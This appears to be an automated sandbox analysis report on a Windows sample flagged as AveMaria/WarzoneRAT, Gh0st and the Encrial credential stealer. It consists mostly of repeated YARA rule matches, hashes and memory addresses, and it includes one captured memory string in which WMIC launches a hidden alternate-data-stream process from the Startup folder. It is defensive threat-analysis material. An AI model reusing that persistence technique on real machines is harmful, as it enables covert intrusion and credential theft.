Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware | Author: Florian Roth
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: WMIC.exe, 0000000D.00000002.288337503.000001B74FE00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C:\Windows\System32\Wbem\WMIC.exewmic process call create '"C:\ProgramData:ApplicationData"'wmic process call create '"C:\ProgramData:ApplicationData"'Winsta0\Default
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00415808
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00412922
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00412480
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00416D23
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_004156DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0040B784
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D21BF8
Source: C:\ProgramData\images.exe | Code function: 4_3_02F542D0
Source: C:\ProgramData\images.exe | Code function: 4_3_02F91AA0
Source: C:\ProgramData\images.exe | Code function: 4_3_02F86B50
Source: C:\ProgramData\images.exe | Code function: 4_3_02F45AB0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmi.dll
Source: unknown | Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
Source: Joe Sandbox View | Dropped File: C:\Program Files\Microsoft DN1\sqlmap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT | author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT | author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT | author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT | author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT | author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT | author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 | date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 | date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
